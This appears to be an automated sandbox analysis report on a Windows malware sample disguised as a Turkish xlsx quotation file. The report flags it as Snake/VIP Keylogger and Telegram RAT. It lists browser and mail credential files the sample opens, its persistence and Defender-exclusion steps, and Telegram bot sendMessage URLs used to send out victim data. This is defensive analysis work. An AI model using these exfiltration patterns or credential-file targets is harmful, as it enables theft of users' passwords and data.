Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528049 Sample: TEKL#U0130F TALEP VE F#U013... Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 2 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 68 16 other signatures 2->68 8 TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe 7 2->8         started        12 YzkHZRBcm.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\Roaming\YzkHZRBcm.exe, PE32 8->38 dropped 40 C:\Users\...\YzkHZRBcm.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpA1D9.tmp, XML 8->42 dropped 44 TEKL#U0130F TALEP ...#U0130_xlsx.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 24 YzkHZRBcm.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49828, 49871 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.96.3, 443, 49729, 49740 CLOUDFLARENETUS European Union 14->54 56 checkip.dyndns.com 132.226.247.73, 49722, 49744, 49754 UTMEMUS United States 14->56 78 Loading BitLocker PowerShell Module 18->78 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        80 Tries to steal Mail credentials (via file / registry access) 24->80 82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 36 conhost.exe 26->36         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    https://reallyfreegeoip.org/xml/8.46.123.33 false
    • URL Reputation: safe
    		 unknown
    http://checkip.dyndns.org/ false
    • URL Reputation: safe
    		 unknown
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
      		unknown